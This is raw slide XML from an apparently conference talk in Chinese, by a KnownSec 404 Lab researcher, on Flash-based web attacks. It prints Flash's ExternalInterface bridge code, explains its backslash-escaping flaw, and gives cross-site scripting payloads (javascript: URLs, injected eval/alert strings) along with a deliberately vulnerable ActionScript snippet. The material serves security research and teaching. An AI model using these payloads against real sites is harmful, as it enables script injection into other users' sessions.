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318" r:id="rId5"/>
    <p:sldId id="319" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="261" r:id="rId8"/>
    <p:sldId id="310" r:id="rId9"/>
    <p:sldId id="311" r:id="rId10"/>
    <p:sldId id="276" r:id="rId11"/>
    <p:sldId id="266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3" r:id="rId24"/>
    <p:sldId id="278" r:id="rId25"/>
    <p:sldId id="314" r:id="rId26"/>
    <p:sldId id="280" r:id="rId27"/>
    <p:sldId id="315" r:id="rId28"/>
    <p:sldId id="282" r:id="rId29"/>
    <p:sldId id="281" r:id="rId30"/>
    <p:sldId id="284" r:id="rId31"/>
    <p:sldId id="321" r:id="rId32"/>
    <p:sldId id="322" r:id="rId33"/>
    <p:sldId id="323" r:id="rId34"/>
    <p:sldId id="324" r:id="rId35"/>
    <p:sldId id="325" r:id="rId36"/>
    <p:sldId id="326" r:id="rId37"/>
    <p:sldId id="320" r:id="rId38"/>
    <p:sldId id="283" r:id="rId39"/>
    <p:sldId id="286" r:id="rId40"/>
    <p:sldId id="285" r:id="rId41"/>
    <p:sldId id="287" r:id="rId42"/>
    <p:sldId id="331" r:id="rId43"/>
    <p:sldId id="295" r:id="rId44"/>
    <p:sldId id="294" r:id="rId45"/>
    <p:sldId id="329" r:id="rId46"/>
    <p:sldId id="296" r:id="rId47"/>
    <p:sldId id="297" r:id="rId48"/>
    <p:sldId id="330" r:id="rId49"/>
    <p:sldId id="316" r:id="rId50"/>
    <p:sldId id="317" r:id="rId51"/>
    <p:sldId id="298" r:id="rId52"/>
    <p:sldId id="335" r:id="rId53"/>
    <p:sldId id="300" r:id="rId54"/>
    <p:sldId id="302" r:id="rId55"/>
    <p:sldId id="304" r:id="rId56"/>
    <p:sldId id="299" r:id="rId57"/>
    <p:sldId id="308" r:id="rId58"/>
    <p:sldId id="309" r:id="rId59"/>
    <p:sldId id="334" r:id="rId60"/>
    <p:sldId id="332" r:id="rId61"/>
    <p:sldId id="301" r:id="rId62"/>
    <p:sldId id="303" r:id="rId63"/>
    <p:sldId id="305" r:id="rId64"/>
    <p:sldId id="307" r:id="rId65"/>
    <p:sldId id="306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85766" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="63" d="100"/>
          <a:sy n="63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E0A75-76C1-4770-93E0-DE476C774C9E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956E-8F78-4742-B454-6386A743A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95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0DC61-CA7B-4A5C-A50A-692EE29544AC}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2015/8/17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D8BCE-5033-4307-9489-940AD7045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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTML DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的权限复杂度高太多了！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D8BCE-5033-4307-9489-940AD7045D7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4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2241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8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5E001-A9D8-4705-88F7-E1E304F72F4A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033B2-BEE0-41F9-822B-67BE4A89C5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BC391-6843-49CB-88E6-B086A9C52CDD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07ED4-FA56-4F13-8253-B033405920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3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558B4-EFF3-4AEC-91BA-67426223A804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E0BAE-3D28-4AF3-88EA-E125DFFB5C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6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7AA74-7CD8-4729-A00E-7F7310F3A417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508E0-1C23-4130-844E-261AB33EC5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5B536-F180-4038-A054-842DA709F690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2A185-213A-4638-BD67-48B8CDF0C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7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88155-4C76-4807-9ABB-D51F0B3403DF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B886E-3AD1-42E1-AFAD-6A8607216D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DB083-F6BE-4DA5-A6C3-5AEE6C0F8450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7FF56-1F17-4A06-B4DC-F65D827C08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9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42074-71DA-4E78-8DF8-200EBAD992E1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8CCC2-3A19-4C61-8CC8-1610E3B98A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0C782-7F00-46A4-8B24-C23BDCEF2FBE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FF5AE-C2BC-4379-A29F-09CA2162F6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95974-2399-4759-BB29-75E0CC4A1CDB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1EC61-E6ED-4E1A-8FCE-6533DF7DCF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8313" y="6237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D0944B-C8BC-4A80-BF79-CC39405D316E}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2015/8/17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688" y="62372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713413-CE91-48DC-B23B-6BA449596D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611188" y="1484313"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隐蔽的战场</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>—Flash Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击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913" y="3141663"/>
            <a:ext cx="6400800" cy="1223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余弦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Flash Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击的关键点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0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ActionScript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/>
              <a:t>扩</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>大了攻击面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>本质是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形式给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ActionScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>传递值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劫持是一件轻松的事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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一些安全缺陷带来的影响可能是致命的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8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843" y="1628800"/>
            <a:ext cx="8440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function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arrayToXML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s = "&lt;array&gt;";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for (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=0;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obj.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;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	s += "&lt;property id=\"" +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 + "\"&gt;" +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toXML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]) + "&lt;/property&gt;";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return s+"&lt;/array&gt;";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function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argumentsToXML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obj,index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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s = "&lt;arguments&gt;";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for (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=index;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obj.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;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++)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	s +=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toXML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]);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return s+"&lt;/arguments&gt;";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5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843" y="1596856"/>
            <a:ext cx="8440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function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objectToXML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s = "&lt;object&gt;";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for (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prop in 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	s += "&lt;property id=\"" + prop + "\"&gt;" +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toXML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obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[prop]) + "&lt;/property&gt;";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return s+"&lt;/object&gt;";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function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escapeXML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(s)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return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s.replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(/&amp;/g, "&amp;amp;").replace(/&lt;/g, "&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;").replace(/&gt;/g, "&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;").replace(/"/g, "&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;").replace(/'/g, "&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;");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5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9843" y="1268760"/>
            <a:ext cx="84406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function __flash__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toXML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(value)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1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> type =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typeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(value);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if (type == "string")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	return "&lt;string&gt;" + __flash__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escapeXML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(value) + "&lt;/string&gt;";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 else if (type == "undefined")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return "&lt;undefined/&gt;";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 else if (type == "number")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return "&lt;number&gt;" + value + "&lt;/number&gt;";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 else if (value == null)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return "&lt;null/&gt;";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 else if (type == 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sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>")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return value ? "&lt;true/&gt;" : "&lt;false/&gt;";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 else if (value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instanceof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Date)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return "&lt;date&gt;" +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value.getTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>() + "&lt;/date&gt;";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} else if (value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instanceof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Array)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return __flash__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arrayToXML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(value);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} else if (type == "object")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return __flash__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objectToXML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(value);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} else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    return "&lt;null/&gt;"; //???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1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843" y="1574790"/>
            <a:ext cx="8440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function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addCallback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(instance, name)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instance[name] = function () {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return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eval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instance.CallFunction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("&lt;invoke name=\""+name+"\" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>returntype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=\"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\"&gt;" +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argumentsToXML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(arguments,0) + "&lt;/invoke&gt;"));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function __flash__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>removeCallback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(instance, name)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instance[name] = null;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JavaScript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/>
              <a:t>伪协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AS2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>getURL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javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(1)")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>AS3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>navigateToURL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URLRequest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javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(1)'),"_self");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JavaScript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ExternalInterface.call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a=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>&amp;c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alert(1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>try { __flash__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>toXML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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("alert(1)")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>;} catch (e) { "&lt;undefined/&gt;"; }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204864"/>
            <a:ext cx="6315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param:Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/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root.loaderInfo.parameters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action:String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/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param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>["a"];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cmd:String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>["c"];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flash.external.ExternalInterface.call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(action,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cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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JavaScript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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a());}catch(e){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(2);}//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&amp;c=alert(1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>try { __flash__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>toXML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a());}catch(e){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(2);}//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>("alert(1)")) ; } catch (e) { "&lt;undefined/&gt;"; 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6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JavaScript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&amp;c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\"));}catch(e){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1);}//</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>try { __flash__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>toXML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a("\\"));}catch(e){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1);}//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>")) ; } catch (e) { "&lt;undefined/&gt;"; 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 readme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KNOWNSEC VP, 404 Lab Leader</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>KCon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kcon.knownsec.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Sebug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sebug.net</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ZoomEye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>CyberSpace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Search Engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>zoomeye.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Web2.0 Hacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>《Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>前端黑客技术揭秘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>》</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>web2hack.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN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JavaScript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ExternalInterface.call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>魔法缺陷本质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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>转义为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>\"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>\" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>转义为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>\\"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>本应该是：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>\" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>转义为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>\\\"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>没被转义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JavaScript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ExternalInterface.addCallback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>魔法缺陷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swf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>").test();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>__flash__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>addCallback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swf_ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>"), "test");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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\\";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alert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document.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aa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322746"/>
            <a:ext cx="6015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import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flash.external.ExternalInterface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function test(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>k:String</a:t>
            </a:r>
            <a:r>
